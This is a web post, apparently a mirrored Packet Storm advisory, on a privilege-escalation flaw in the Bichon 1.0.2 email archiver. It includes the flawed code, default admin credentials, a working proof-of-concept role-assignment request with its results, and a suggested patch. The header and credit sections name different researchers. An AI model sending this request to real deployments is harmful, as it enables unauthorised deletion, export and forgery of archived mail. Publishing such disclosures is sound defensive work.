{"id":55361,"date":"2026-05-18T14:51:37","date_gmt":"2026-05-18T14:51:37","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=55361"},"modified":"2026-05-18T14:51:37","modified_gmt":"2026-05-18T14:51:37","slug":"bichon-102-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=55361","title":{"rendered":"\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation_PACKETSTORM:221273"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-18T19:05:29&#8243;,&#8221;description&#8221;:&#8221;Bichon version 1.0.2 suffers from a vertical privilege escalation vulnerability via the account role assignment functionality&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:221273&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;Bichon 1.0.2 Vertical Privilege Escalation via Account Role Assignment\\n    ======================================================================\\n    \\n    Vendor:        rustmailer\\n    Product:       Bichon &#8211; self-hosted email archiving server (Rust + TypeScript)\\n    Project URL:   https:\/\/github.com\/rustmailer\/bichon\\n    Affected:      All versions through HEAD as of 2026-05-18\\n                   Commit:  9daab241b0220e81e43d4b98616d77fa45ad58c7\\n                   Release: 1.0.2 (Docker: rustmailer\/bichon:1.0.2,\\n                            sha256 6a8232f1db4df939cfe28c54661699638d859f5923ff1965aacdabed226c67f0)\\n    Patched:       Pending vendor fix\\n    Severity:      High\\n    CVSS 3.1:      7.6  (AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:L)\\n    CWE:           CWE-269 (Improper Privilege Management)\\n                   CWE-863 (Incorrect Authorization)\\n    CVE:           Pending (requested via GitHub CNA)\\n    Discovered:    2026-05-18 (manual source review)\\n    Researcher:    AoxLir  \\u003ceren.demir@razesecurity.com\\u003e\\n    Disclosure:    Coordinated (Project Zero 90-day standard)\\n    \\n    \\n    I. Background\\n    =============\\n    \\n    Bichon is a self-hosted email archiving server written in Rust with a\\n    SvelteKit frontend. It integrates IMAP fetching, OAuth2 mail providers,\\n    SOCKS5 proxy support, and a REST API protected by an RBAC subsystem of\\n    22 granular permissions across 5 built-in roles and an unlimited number\\n    of admin-defined custom roles.\\n    \\n    The vendor README (line 101) states:\\n    \\n       \\&#8221;Account-Level Isolation: Grant users access to specific accounts\\n        with scoped roles. Permissions enforced at the API layer.\\&#8221;\\n    \\n    The vulnerability documented here directly contradicts that claim.\\n    \\n    \\n    II. Vulnerability Detail\\n    ========================\\n    \\n    The endpoint POST \/api\/v1\/accounts\/access\/assignments calls\\n    BatchAccountRoleRequest::do_assign() (crates\/core\/src\/account\/grant.rs\\n    lines 115-154):\\n    \\n        pub fn do_assign(self, context: \\u0026ClientContext) -\\u003e BichonResult\\u003c()\\u003e {\\n            for account_id in \\u0026self.account_ids {\\n                let assigned_role_id = context.user\\n                    .account_access_map.get(account_id)&#8230;?;\\n                let user_scoped_role = UserRole::find(*assigned_role_id)?&#8230;?;\\n    \\n                \/\/ Critical Check: Does this role grant management\/sharing rights?\\n                if !user_scoped_role.permissions\\n                    .contains(Permission::ACCOUNT_MANAGE) {\\n                    return Err(&#8230;);\\n                }\\n    \\n                \/\/ Optional: Ensure manager isn&#8217;t giving away perms they don&#8217;t have\\n                \/\/ ^^^ NOT IMPLEMENTED &#8212; the missing check.\\n            }\\n    \\n            Self::grant_batch_account_access(\\n                self.account_ids, self.user_ids, self.role_id\\n            )\\n        }\\n    \\n    The check verifies the caller holds Permission::ACCOUNT_MANAGE on every\\n    target account but does NOT compare the granted role&#8217;s permissions\\n    against the caller&#8217;s own.  Any user holding ACCOUNT_MANAGE on an account\\n    &#8211; a permission an administrator might include in a narrowly scoped\\n    custom role intended only for sharing\/auditing &#8211; can therefore grant\\n    themselves OR any other user the built-in AccountManager role (or any\\n    arbitrary custom role) on that account, gaining permissions such as:\\n    \\n       data:delete         &#8211; irreversible mail deletion\\n       data:raw:download   &#8211; exfiltration of raw EML\/MIME files\\n       data:export:batch   &#8211; bulk export\\n       data:import:batch   &#8211; injection of forged messages into the archive\\n       data:smtp:ingest    &#8211; abuse of the SMTP ingest pipeline\\n       data:manage         &#8211; metadata tampering\\n    \\n    The REST handler (crates\/server\/src\/rest\/api\/account.rs lines 303-312)\\n    adds no additional authorization beyond calling do_assign().\\n    \\n    \\n    III. Proof of Concept\\n    =====================\\n    \\n    Tested live against the official Docker image rustmailer\/bichon:1.0.2.\\n    \\n    Setup\\n    &#8212;&#8211;\\n    \\n      $ docker run -d &#8211;name bichon-poc -p 15630:15630 \\\\\\n          -v \/tmp\/bichon-poc\/data:\/data &#8211;user 1000:1000 \\\\\\n          -e BICHON_ROOT_DIR=\/data \\\\\\n          -e BICHON_ENCRYPT_PASSWORD=poc-pw \\\\\\n          rustmailer\/bichon:latest\\n    \\n    Default credentials: admin \/ admin@bichon\\n    \\n    Step 1: Admin creates a custom Account role with restricted permissions\\n            but containing ACCOUNT_MANAGE:\\n    \\n      POST \/api\/v1\/roles\\n      Authorization: Bearer \\u003cadmin_token\\u003e\\n      Content-Type: application\/json\\n    \\n      {\\&#8221;name\\&#8221;:\\&#8221;RestrictedAuditor\\&#8221;,\\n       \\&#8221;role_type\\&#8221;:\\&#8221;Account\\&#8221;,\\n       \\&#8221;permissions\\&#8221;:[\\&#8221;account:manage\\&#8221;,\\&#8221;account:read_details\\&#8221;,\\&#8221;data:read\\&#8221;]}\\n    \\n    Step 2: Admin creates a low-privilege user &#8216;alice&#8217;, grants her the\\n            RestrictedAuditor role on an account.\\n    \\n    Step 3: Alice logs in and issues the exploit:\\n    \\n      POST \/api\/v1\/accounts\/access\/assignments\\n      Authorization: Bearer \\u003calice_token\\u003e\\n      Content-Type: application\/json\\n    \\n      {\\&#8221;account_ids\\&#8221;: [\\u003caccount_id\\u003e],\\n       \\&#8221;user_ids\\&#8221;: [\\u003calice_id\\u003e],\\n       \\&#8221;role_id\\&#8221;: 200100000000000}\\n    \\n      Response: HTTP\/1.1 200 OK\\n    \\n    (200100000000000 is the built-in AccountManager role ID, returned by\\n     GET \/api\/v1\/list-roles.)\\n    \\n    Verification\\n    &#8212;&#8212;&#8212;&#8212;\\n    \\n      Alice&#8217;s permissions BEFORE the call:\\n        account:manage, account:read_details, data:read              (3 perms)\\n    \\n      Alice&#8217;s permissions AFTER the call:\\n        account:manage, account:read_details, data:read,\\n        data:delete, data:export:batch, data:import:batch,\\n        data:manage, data:raw:download, data:smtp:ingest             (9 perms)\\n    \\n      Six new permissions gained, including the high-impact data:delete\\n      (irreversible mail deletion) and data:raw:download (raw EML export).\\n      Total elapsed: a single HTTP POST, no errors.\\n    \\n    \\n    IV. Extended Tests\\n    ==================\\n    \\n      * Cross-user promotion: alice (RestrictedAuditor on account A) promoted\\n        a different user &#8216;bob&#8217; (zero account access) to AccountManager on A\\n        &#8212; HTTP 200.  Confirms lateral movement is possible, not just\\n        self-promotion.\\n    \\n      * Multi-account boundary: alice attempted to escalate on accounts A\\n        (had access) AND B (no access) in a single request &#8212; HTTP 403\\n        \\&#8221;No access to account B\\&#8221;.  The account-boundary check works\\n        correctly; only the per-account permission-bound check is missing.\\n    \\n      * Arbitrary custom role: alice granted herself an admin-created\\n        custom role with 9 high-impact permissions (effectively a renamed\\n        AccountManager) &#8212; HTTP 200.  Refutes any rebuttal that promotion\\n        is bounded by the built-in AccountManager role.\\n    \\n    \\n    V. Impact\\n    =========\\n    \\n    Authenticated user with the narrowest custom role that contains\\n    ACCOUNT_MANAGE can:\\n    \\n      &#8211; Delete all archived messages for the affected account (regulatory\\n        \/ forensic impact &#8212; archives are typically subject to legal hold).\\n      &#8211; Exfiltrate raw EML\/MIME (PII, business confidential).\\n      &#8211; Inject forged messages into the archive (integrity \/ chain-of-\\n        custody compromise).\\n      &#8211; Promote arbitrary other users to AccountManager (lateral movement\\n        in multi-tenant deployments).\\n    \\n    \\n    VI. Solution\\n    ============\\n    \\n    Add a permission-subset check inside do_assign(), after the existing\\n    ACCOUNT_MANAGE check:\\n    \\n        let target_role = UserRole::find(self.role_id)?\\n            .ok_or_else(|| raise_error!(\\&#8221;Target role not found\\&#8221;.into(),\\n                                        ErrorCode::ResourceNotFound))?;\\n    \\n        let extra: HashSet\\u003c_\\u003e = target_role.permissions\\n            .difference(\\u0026user_scoped_role.permissions)\\n            .collect();\\n    \\n        if !extra.is_empty() {\\n            return Err(raise_error!(\\n                format!(\\&#8221;Cannot grant permissions you do not hold: {:?}\\&#8221;,\\n                        extra),\\n                ErrorCode::Forbidden));\\n        }\\n    \\n    For defense in depth, also require Permission::ACCOUNT_MANAGE_ALL at\\n    the REST handler layer (crates\/server\/src\/rest\/api\/account.rs:303), so\\n    that org-wide account sharing requires an administrator.\\n    \\n    \\n    \\n    VII. Credit\\n    ============\\n    \\n    Discovered and reported by MrOruc, independent security researcher.\\n    GitHub: https:\/\/github.com\/MrOruc\\n    Email:  kerim.oruc@razesecurity.com&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/221273&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/221273\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-18T19:05:29&#8243;,&#8221;description&#8221;:&#8221;Bichon version 1.0.2 suffers from a vertical privilege escalation vulnerability via the account role assignment functionality&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:221273&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;Bichon 1.0.2 Vertical Privilege Escalation via&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-55361","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation_PACKETSTORM:221273 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=55361\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation_PACKETSTORM:221273 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-18T19:05:29&#8243;,&#8221;description&#8221;:&#8221;Bichon version 1.0.2 suffers from a vertical privilege escalation vulnerability via the account role assignment functionality&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:221273&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;Bichon 1.0.2 Vertical Privilege Escalation via...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=55361\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-18T14:51:37+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55361#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55361\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation_PACKETSTORM:221273\",\"datePublished\":\"2026-05-18T14:51:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55361\"},\"wordCount\":1308,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=55361#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55361\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55361\",\"name\":\"\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation_PACKETSTORM:221273 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-18T14:51:37+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55361#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=55361\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=55361#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation_PACKETSTORM:221273\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation_PACKETSTORM:221273 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=55361","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation_PACKETSTORM:221273 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-18T19:05:29&#8243;,&#8221;description&#8221;:&#8221;Bichon version 1.0.2 suffers from a vertical privilege escalation vulnerability via the account role assignment functionality&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:221273&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;Bichon 1.0.2 Vertical Privilege Escalation via...","og_url":"https:\/\/zero.redgem.net\/?p=55361","og_site_name":"zero redgem","article_published_time":"2026-05-18T14:51:37+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=55361#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=55361"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation_PACKETSTORM:221273","datePublished":"2026-05-18T14:51:37+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=55361"},"wordCount":1308,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=55361#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=55361","url":"https:\/\/zero.redgem.net\/?p=55361","name":"\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation_PACKETSTORM:221273 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-18T14:51:37+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=55361#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=55361"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=55361#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Bichon 1.0.2 Privilege Escalation_PACKETSTORM:221273"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/55361","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=55361"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/55361\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=55361"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=55361"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=55361"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}